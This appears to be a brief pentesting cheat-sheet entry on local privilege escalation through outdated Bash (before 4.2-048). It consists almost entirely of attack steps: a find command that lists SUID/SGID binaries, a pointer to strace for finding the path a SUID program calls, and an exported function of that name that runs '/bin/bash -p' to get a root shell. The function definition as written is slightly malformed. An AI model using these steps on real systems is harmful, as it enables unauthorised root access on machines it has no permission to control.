Outdated Bash

Bash <4.2-048 can define user functions with absolute path

Find the SUID

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -la {} \; 2> /dev/null

run strace to find the function inside, then write a new one with bash function inside

function $functionname {/bin/bash -p; }
export -f $functionname

Execute the suid that executes the functions giving root shell